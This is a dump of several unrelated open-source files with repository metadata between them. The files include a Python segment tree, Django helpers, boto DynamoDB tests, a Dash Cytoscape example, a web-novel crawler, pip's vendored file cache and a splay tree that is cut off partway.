_set(sleft, sright, 2*v+2, vmid, vright, value)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
# print v, start, stop, vleft, vright, value, tree
_set(start, stop, 0, 0, n, value)
def add(self, start, stop, diff):
"""
LPSTRee.add(start, stop, diff)
Add diff to all elements in [start, stop).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _add(sleft, sright, v, vleft, vright, diff):
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] += self.nodef(diff, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
if booladd[v]:
lazyadd[v] += diff
else:
booladd[v] = True
lazyadd[v] = diff
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_add(sleft, sright, 2*v+1, vleft, vmid, diff)
_add(sleft, sright, 2*v+2, vmid, vright, diff)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
_add(start, stop, 0, 0, n, diff)
def __getitem__(self, index):
return self.get(index, index+1)
def __setitem__(self, index, value):
self.set(index, index+1, value)
def __repr__(self):
return repr([self[x] for x in xrange(self.n)])
def tolist(self):
"""
LPSTree.tolist() -> a list object
Return a list containing all the elements in LPSTree.
"""
return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
tree = LPSTree(10, reducef=max)
# tree = LPSTree(10, modulo=2)
# tree = LPSTree(10)
print tree.n, tree.size
print tree.get(0, 10)
print tree[0], tree[1]
tree[9] = 20
print tree
print tree.get(0, 10)
tree.set(1,5,5)
print tree
tree.add(1, 10, 12)
print tree
tree.set(0, 3, 5)
tree.add(0, 4, 2)
print tree
tree.set(0, 10, 0)
print tree
tree.add(1, 9, -10)
print tree
print tree.get(8, 9)
tree.set(0, 3, 9)
print tree
tree = LPSTree(10, reducef=max)
print tree
# tree.set(0, 10, 0)
# help(tree.set)
tree.set(1, 9, -10)
print tree
|
[
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34
|
19892b65355f7661cf5e42d2f749904788c1a7d0
|
/dailyfresh/daily_fresh/utils/mixin.py
|
6174e5aba8081e3b2cf0368084ea7f0853225db5
|
[] |
no_license
|
BinXiaoEr/daily_fresh
|
35902cb6753851a14517265db3738a008610c7d8
|
d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d
|
refs/heads/master
| 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
@classmethod
def as_view(cls, **initkwargs):
# 调用父类的as_view
view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
return login_required(view)
|
[
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf
|
612325535126eaddebc230d8c27af095c8e5cc2f
|
/depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py
|
e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/proto-quic_1V94
|
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
|
feee14d96ee95313f236e0f0e3ff7719246c84f7
|
refs/heads/master
| 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,427 |
py
|
#!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
def setUp(self):
pass
def test_encoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
self.assertEqual(dynamizer.encode(54), {'N': '54'})
self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
self.assertEqual(dynamizer.encode(set([1, 2, 3])),
{'NS': ['1', '2', '3']})
self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
{'B': 'AQ=='})
self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
{'BS': ['AQ==']})
self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
{'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
{'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
self.assertEqual(dynamizer.encode(None), {'NULL': True})
self.assertEqual(dynamizer.encode(False), {'BOOL': False})
def test_decoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
self.assertEqual(dynamizer.decode({'N': '54'}), 54)
self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
set([1, 2, 3]))
self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
set(['foo', 'bar']))
self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
set([types.Binary(b'\x01')]))
self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
['foo', 54, [1]])
self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
{'foo': 'bar', 'hoge': {'sub': 1}})
self.assertEqual(dynamizer.decode({'NULL': True}), None)
self.assertEqual(dynamizer.decode({'BOOL': False}), False)
def test_float_conversion_errors(self):
dynamizer = types.Dynamizer()
# When supporting decimals, certain floats will work:
self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
# And some will generate errors, which is why it's best
# to just use Decimals directly:
with self.assertRaises(DynamoDBNumberError):
dynamizer.encode(1.1)
def test_non_boolean_conversions(self):
dynamizer = types.NonBooleanDynamizer()
self.assertEqual(dynamizer.encode(True), {'N': '1'})
def test_lossy_float_conversions(self):
dynamizer = types.LossyFloatDynamizer()
# Just testing the differences here, specifically float conversions:
self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
self.assertEqual(dynamizer.encode(set([1.1])),
{'NS': ['1.1']})
self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
def test_good_input(self):
data = types.Binary(b'\x01')
self.assertEqual(b'\x01', data)
self.assertEqual(b'\x01', bytes(data))
def test_non_ascii_good_input(self):
# Binary data that is out of ASCII range
data = types.Binary(b'\x88')
self.assertEqual(b'\x88', data)
self.assertEqual(b'\x88', bytes(data))
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_bad_input(self):
with self.assertRaises(TypeError):
types.Binary(1)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_bytes_input(self):
data = types.Binary(1)
self.assertEqual(data, b'\x00')
self.assertEqual(data.value, b'\x00')
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_unicode_py2(self):
# It's dirty. But remains for backward compatibility.
data = types.Binary(u'\x01')
self.assertEqual(data, b'\x01')
self.assertEqual(bytes(data), b'\x01')
# Delegate to built-in b'\x01' == u'\x01'
# In Python 2.x these are considered equal
self.assertEqual(data, u'\x01')
# Check that the value field is of type bytes
self.assertEqual(type(data.value), bytes)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_unicode_py3(self):
with self.assertRaises(TypeError):
types.Binary(u'\x01')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7321ac8c981ab9abb728e9c05fe1a2576ef0d878
|
3c327aa333bbeafacb8d5bd253814776ffcd0012
|
/df_user/urls.py
|
bf6fcb54488289e42e7484712a3e096f56b612be
|
[] |
no_license
|
1635848644/shopping
|
c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18
|
d820e828eeed3911ea7741e4f11f4c6d83e993c6
|
refs/heads/master
| 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 405 |
py
|
#coding=utf-8
from django.conf.urls import url
from df_user import views
urlpatterns=[
url('register/',views.register),
url('login/',views.login),
url('logout/',views.logout),
url('addHarvsetAddress/',views.addHarvsetAddress),
url('user_center_info/',views.user_center_info),
url('user_center_order/',views.user_center_order),
url('user_center_site/',views.user_center_site),
]
|
[
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49
|
46c2418ecfcf3c7034a267364185208a665be583
|
/edb/tools/docs/cli.py
|
2c9295564c14536c42a30b9de2055cc410bdcb02
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jankeromnes/edgedb
|
3434549fb0731632ed7adb7fcb329480dee50d91
|
40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94
|
refs/heads/master
| 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 |
Apache-2.0
| 2022-01-28T09:00:32 | 2019-05-10T12:24:55 |
Python
|
UTF-8
|
Python
| false | false | 1,466 |
py
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
has_content = True
optional_arguments = 0
required_arguments = 0
option_spec = {}
def run(self):
self.arguments = ['cli-synopsis']
return super().run()
class CLIDomain(s_domains.Domain):
name = "cli"
label = "Command Line Interface"
directives = {
'synopsis': CLISynopsisDirective,
}
def setup_domain(app):
app.add_lexer("cli", EdgeQLLexer())
app.add_lexer("cli-synopsis", EdgeQLLexer())
app.add_role(
'cli:synopsis',
shared.InlineCodeRole('cli-synopsis'))
app.add_domain(CLIDomain)
|
[
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8
|
50e2012ecea8307e278d1132ca0094adb940aff2
|
/lib/review/my_process/my_multiprocessing.py
|
a299b8a3185df0bb568f1c9bc93484f95d15cfcb
|
[] |
no_license
|
Lewescaiyong/my_library
|
6689cae2db4aaa980b4bd5ed9f21691eefbff2fe
|
35d0d29097823ccef74fa29ca8756a7f59ceeb78
|
refs/heads/master
| 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing.dummy import Pool
pool1 = multiprocessing.Pool()
pool2 = Pool()
pool1.map()
pool2.map()
|
[
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8
|
c52ea8af6a4d3c32a0557c39d683a4d01b2188db
|
/ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py
|
00701dcffe65b44108634f361e1dafb4d3efea61
|
[
"MIT"
] |
permissive
|
plotly-dash-book/plotly-dash-book
|
dcde031766d17adf6fc670c8aec9c8d4e267eeb7
|
cc54f7ac6066a741f733facbd002222a87746e02
|
refs/heads/master
| 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 |
MIT
| 2021-05-31T04:47:36 | 2019-07-18T04:36:50 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,531 |
py
|
import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# ノードを17個定義
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# エッジを定義
edges = [
{"data": {"source": 0, "target": 1}},
{"data": {"source": 0, "target": 2}},
{"data": {"source": 0, "target": 3}},
{"data": {"source": 0, "target": 4}},
{"data": {"source": 2, "target": 3}},
{"data": {"source": 3, "target": 4}},
{"data": {"source": 4, "target": 5}},
{"data": {"source": 5, "target": 1}},
{"data": {"source": 1, "target": 6}},
{"data": {"source": 2, "target": 7}},
{"data": {"source": 2, "target": 8}},
{"data": {"source": 3, "target": 9}},
{"data": {"source": 4, "target": 10}},
{"data": {"source": 4, "target": 11}},
{"data": {"source": 4, "target": 12}},
{"data": {"source": 5, "target": 13}},
{"data": {"source": 5, "target": 14}},
{"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
id="dash_cyto_layout",
style={"width": "400px", "height": "400px"},
layout={"name": "grid", "rows": 3, "columns": 6},
elements=elements,
stylesheet=[
{"selector": "node", "style": {"content": "data(label)"}},
# エッジのカーブのスタイルを曲線にする
{"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KLke67efuam6ajLrt_2.py
|
1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,765 |
py
|
"""
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
half = num // 2
deck = list(range(num))
left, right = deck[:half], deck[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count = 1
while deck_s != deck:
left, right = deck_s[:half], deck_s[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count += 1
return count
|
[
"[email protected]"
] | |
49b7c6233cb3d031e79f2710167aae956de76e29
|
55a281d728541773e6eda896599c0cc48dfe5156
|
/Advanced/venv/Scripts/easy_install-script.py
|
8e473e4d78117e10d75b080582317f8367fd492a
|
[] |
no_license
|
dhariskov/python-advanced
|
c0bebd937f3849dd62ae2834cbdf9f8100b2bb56
|
4725070c960d3c234ed2f20ff2156e2f89514a02
|
refs/heads/master
| 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
#!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49
|
c5be6a92f216957d340474b58507606a38c10f5f
|
/course-files/tutorials/tutorial04/answers/drawings/d5.py
|
e0e46a2f538962b9b15a80780794e0fa647bfa31
|
[] |
no_license
|
eecs110/winter2019
|
0b314c35e886b8099368ed7dfd51b707ab73c0c2
|
f4107207ca1c9c10b78bdbb74fd82410b00ee363
|
refs/heads/master
| 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
from tkinter import Canvas, Tk
import random
import shapes
import math
gui = Tk()
gui.title('Circle')
canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()
########################## YOUR CODE BELOW THIS LINE ##############################
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30
for i in range(num_circles):
# calculate new position of x and y
radians = 360 / num_circles * i * (math.pi / 180)
dy = distance_from_center * math.sin(radians)
dx = distance_from_center * math.cos(radians)
x = center_x + dx
y = center_y - dy
shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)
########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop()
|
[
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92
|
9c88b828b783e23b50186a2cbba2c08610d8d10d
|
/espressodb/documentation/__init__.py
|
c16020e168c1d82085be018508a3cd3600a84a63
|
[
"BSD-3-Clause"
] |
permissive
|
remram44/espressodb
|
9a51219c0e7ec6e4c400578d02b97ef95024ba1e
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
refs/heads/master
| 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 |
BSD-3-Clause
| 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null |
UTF-8
|
Python
| false | false | 170 |
py
|
"""The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
|
[
"[email protected]"
] | |
0587480993283923fc28a800af3f56fc5d43a1d5
|
34e3147447875b491bd1b50c915f8848ead80792
|
/uncertainty/constants.py
|
f19f8cdc91913b47521873fbed92985edbf59ce3
|
[
"MIT"
] |
permissive
|
meyersbs/uncertainty
|
680f275ded6aad63012a7ca781d1cf455c66f226
|
c12842cda7bea2d604bb9227a6c0baba9830b6fe
|
refs/heads/master
| 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 |
MIT
| 2023-07-07T18:17:09 | 2017-04-10T17:16:51 |
Python
|
UTF-8
|
Python
| false | false | 510 |
py
|
from pkg_resources import resource_filename
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
UNCERTAINTY_CLASS_MAP = {
'speculation_modal_probable_': 'E',
'speculation_hypo_doxastic _': 'D',
'speculation_hypo_condition _': 'N',
'speculation_hypo_investigation _': 'I',
'O': 'C'
}
|
[
"[email protected]"
] | |
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a
|
3967e42abb6f497ede6d342e8f74bd8150f9c52d
|
/src/spiders/qidiancom.py
|
b70dc6414c2c1f6637e2011d657997aa17ae923f
|
[
"Apache-2.0"
] |
permissive
|
varunprashar5/lightnovel-crawler
|
4886862115c5c3e15a9137e698e14253e14b7423
|
4ca387f3c8f17771befad1d48d417bbc7b9f8bfd
|
refs/heads/master
| 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,465 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
def initialize(self):
self.home_url = 'https://www.qidian.com/'
# end def
def read_novel_info(self):
'''Get novel title, autor, cover etc'''
logger.debug('Visiting %s', self.novel_url)
soup = self.get_soup(self.novel_url)
self.novel_title = soup.select_one('.book-info h1 em').text
logger.info('Novel title: %s', self.novel_title)
self.novel_author = soup.select_one('.book-info h1 a.writer').text
logger.info('Novel author: %s', self.novel_author)
book_img = soup.select_one('#bookImg')
self.novel_cover = self.absolute_url(book_img.find('img')['src'])
self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
logger.info('Novel cover: %s', self.novel_cover)
self.book_id = book_img['data-bid']
logger.debug('Book Id: %s', self.book_id)
self.csrf = self.cookies['_csrfToken']
logger.debug('CSRF Token: %s', self.csrf)
volume_url = chapter_list_url % (self.csrf, self.book_id)
logger.debug('Visiting %s', volume_url)
data = self.get_json(volume_url)
for volume in data['data']['vs']:
vol_id = len(self.volumes) + 1
self.volumes.append({
'id': vol_id,
'title': volume['vN'],
})
for chapter in volume['cs']:
ch_id = len(self.chapters) + 1
self.chapters.append({
'id': ch_id,
'volume': vol_id,
'title': chapter['cN'],
'url': chapter_details_url % chapter['cU'],
})
# end for
# end for
# end def
def download_chapter_body(self, chapter):
'''Download body of a single chapter and return as clean html format'''
logger.info('Downloading %s', chapter['url'])
soup = self.get_soup(chapter['url'])
chapter['body_lock'] = True
chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
return soup.select_one('div.j_readContent').extract()
# end def
# end class
|
[
"[email protected]"
] | |
8e7ea66678d6525ed22d3dd5952486d8e44cd520
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript
|
b6e8c9660762838555a40f518621f6873e7cf39a
|
[
"MIT"
] |
permissive
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 320 |
"""
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
|
[
"[email protected]"
] | ||
1d443fcd8a68dc9c0124dcbff16c16d020b695ab
|
9e549ee54faa8b037f90eac8ecb36f853e460e5e
|
/venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
10f2f222d46d9d3c3a69f254940903cb2be1c86b
|
[
"MIT"
] |
permissive
|
aitoehigie/britecore_flask
|
e8df68e71dd0eac980a7de8c0f20b5a5a16979fe
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
refs/heads/master
| 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 |
MIT
| 2022-12-08T04:54:09 | 2019-03-24T00:38:20 |
Python
|
UTF-8
|
Python
| false | false | 4,176 |
py
|
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
FileNotFoundError
except NameError:
# py2.X
FileNotFoundError = (IOError, OSError)
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(
self,
directory,
forever=False,
filemode=0o0600,
dirmode=0o0700,
use_dir_lock=None,
lock_class=None,
):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
try:
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
except ImportError:
notice = dedent(
"""
NOTE: In order to use the FileCache you must have
lockfile installed. You can install it via pip:
pip install lockfile
"""
)
raise ImportError(notice)
else:
if use_dir_lock:
lock_class = MkdirLockFile
elif lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
try:
with open(name, "rb") as fh:
return fh.read()
except FileNotFoundError:
return None
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
try:
os.remove(name)
except FileNotFoundError:
pass
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
|
[
"[email protected]"
] | |
6757f60ad54e92de598316caec907e610dd16c53
|
e01c5d1ee81cc4104b248be375e93ae29c4b3572
|
/Sequence4/DS/Week5/submission/sub-range-4.py
|
585c33c2a3133ca7749fcb1568e035d6b909e7e3
|
[] |
no_license
|
lalitzz/DS
|
7de54281a34814601f26ee826c722d123ee8bd99
|
66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1
|
refs/heads/master
| 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,351 |
py
|
# python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
def __init__(self, key, sum, left, right, parent):
(self.key, self.sum, self.left, self.right, self.parent) = (key, sum, left, right, parent)
class SplayTree:
def update(self, v):
if v == None:
return
v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
if v.left != None:
v.left.parent = v
if v.right != None:
v.right.parent = v
def smallRotation(self, v):
parent = v.parent
if parent == None:
return
grandparent = v.parent.parent
if parent.left == v:
m = v.right
v.right = parent
parent.left = m
else:
m = v.left
v.left = parent
